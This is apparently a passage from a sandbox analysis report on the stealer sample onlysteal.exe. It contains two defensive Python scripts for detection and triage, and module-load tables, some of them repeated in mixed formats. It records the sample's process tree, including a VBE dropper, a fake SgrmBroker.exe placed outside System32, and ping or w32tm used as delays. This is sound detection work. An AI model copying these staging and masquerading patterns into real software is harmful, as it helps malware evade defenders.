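        if arg.lower().endswith((".vbe", ".vbs", ".js", ".jse", ".wsf")) and execution_from_suspicious_folder(arg):
            return True
    return False


def evaluate(parent: str, image: str, cmdline: str) -> list[str]:
    hits = []
    if system_name_in_unexpected_location(image):
        hits.append("system_process_name_in_unexpected_location")
    if execution_from_suspicious_folder(image):
        hits.append("execution_from_suspicious_folder")
    if script_host_from_suspicious_folder(image, cmdline):
        hits.append("script_host_runs_script_from_suspicious_folder")
    sleeper = living_off_the_land_sleep(cmdline)
    if sleeper and ntpath.basename(_norm(parent)) == "cmd.exe":
        hits.append(f"{sleeper}_used_as_sleep")
    return hits


# Constructed events (parent image, image, command line) from the report's
# process tree, plus two benign negatives at the end.
EVENTS = [
    (r"C:\Users\user\Desktop\onlysteal.exe", r"C:\Windows\SysWOW64\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Intorefnet\hyperBlockCrtCommon.exe",
     r'"C:\Intorefnet/hyperBlockCrtCommon.exe"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE", "ping -n 10 localhost"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\w32tm.exe",
     "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe",
     r'"C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\chcp.com", "chcp 65001"),
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\SgrmBroker.exe",
     r"C:\Windows\system32\SgrmBroker.exe"),
]


def scan(events=EVENTS) -> dict[str, list[str]]:
    """Map each image that triggered at least one rule to its rule names."""
    results = {}
    for parent, image, cmdline in events:
        hits = evaluate(parent, image, cmdline)
        if hits:
            results[image] = hits
    return results


if __name__ == "__main__":
    for image, hits in scan().items():
        print(f"{image}: {', '.join(hits)}")
```

Each rule is deliberately narrow so it can be mapped to a real process-creation source (Sysmon event 1 or Security 4688 with command-line logging): the sleep rule only fires when cmd.exe is the parent, which is what distinguishes a batch-driven delay from an administrator typing ping, and the system-name rule compares the normalised directory rather than the file name alone, so the genuine SgrmBroker.exe under System32 stays quiet.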
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\onlysteal.exe | Section loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
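The rows above record which modules each process loaded, and on their own they are only useful once correlated with where each image runs from. As an added example (not part of the Joe Sandbox report and not Joe Sandbox code), here is a small Python triage script that parses rows in this "Source: ... Section loaded: ..." format and flags the patterns the signatures at the top of the report point at: an image running outside a trusted directory, a Windows system binary name (here SgrmBroker.exe) sitting in an unexpected location, a managed (.NET) image indicated by mscoree.dll, and network-capable modules loaded by such an image. The trusted-directory list, the system-binary name set and the network-module set are illustrative assumptions; the sample rows are a subset copied from the table above, and the parser tolerates both the fused column form and rows that still carry the page's "Jump to behavior" link text.

```python
import re
from collections import OrderedDict
from pathlib import PureWindowsPath

# Sample rows: a subset copied from the "Section loaded" table in this report.
# Both the fused form ("...exeSection loaded: x.dll") and rows carrying the
# page's "Jump to behavior" link text are accepted by the parser below.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Section loaded: winhttp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Section loaded: dnsapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Section loaded: rasapi32.dll
"""

# One table row: the image path runs lazily up to "Section loaded:", and the
# module name is taken lazily up to its ".dll" so trailing link text is dropped.
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*Section loaded:\s*(?P<module>[\w.\-]+?\.dll)",
    re.IGNORECASE,
)

# Assumed allow-list of directories where Windows and installed software live.
TRUSTED_DIRS = (
    r"C:\Windows\System32",
    r"C:\Windows\SysWOW64",
    r"C:\Program Files",
    r"C:\Program Files (x86)",
)
# Assumed, illustrative set of binaries that ship in C:\Windows\System32; the same
# name anywhere else is the "system process name in unsuspected location" pattern.
SYSTEM_BINARIES = {"sgrmbroker.exe", "svchost.exe", "lsass.exe", "csrss.exe", "dllhost.exe"}
# Assumed set of modules whose presence means the image can reach the network.
NETWORK_MODULES = {"winhttp.dll", "wininet.dll", "ws2_32.dll", "wsock32.dll",
                   "mswsock.dll", "dnsapi.dll", "rasapi32.dll"}


def parse_loads(text):
    """Map each image path to the modules it loaded, in row order (repeats kept)."""
    loads = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            loads.setdefault(m.group("image"), []).append(m.group("module").lower())
    return loads


def is_trusted_location(image):
    """True if the image's directory is one of TRUSTED_DIRS or nested beneath one."""
    parent = str(PureWindowsPath(image).parent).lower()
    return any(parent == d.lower() or parent.startswith(d.lower() + "\\")
               for d in TRUSTED_DIRS)


def assess(loads):
    """Return {image: [finding, ...]} for every image running outside TRUSTED_DIRS."""
    findings = OrderedDict()
    for image, modules in loads.items():
        if is_trusted_location(image):
            continue
        path = PureWindowsPath(image)
        notes = [f"runs from untrusted directory: {path.parent}"]
        if path.name.lower() in SYSTEM_BINARIES:
            notes.append(f"system binary name {path.name} outside C:\\Windows\\System32")
        if "mscoree.dll" in modules:
            notes.append("managed (.NET) image: mscoree.dll loaded")
        net = sorted(NETWORK_MODULES.intersection(modules))
        if net:
            notes.append("network-capable modules loaded: " + ", ".join(net))
        findings[image] = notes
    return findings


if __name__ == "__main__":
    for image, notes in assess(parse_loads(SAMPLE_LOG)).items():
        print(image)
        for note in notes:
            print("  -", note)
```

Run against the sample rows, the script stays silent for wscript.exe and PING.EXE (both under trusted system directories) and reports onlysteal.exe on the Desktop, the .NET hyperBlockCrtCommon.exe in C:\Intorefnet, and the SgrmBroker.exe copy in the Default user's Start Menu, which combines a system binary name, a managed image and winhttp/dnsapi/rasapi32 loads. To apply it to the full table, paste the rows into SAMPLE_LOG or read them from a file; the directory and module sets are the knobs to tune for an environment.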
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: version.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ktmw32.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rasapi32.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rasman.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rtutils.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: mswsock.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: winhttp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: iphlpapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dnsapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: uxtheme.dll
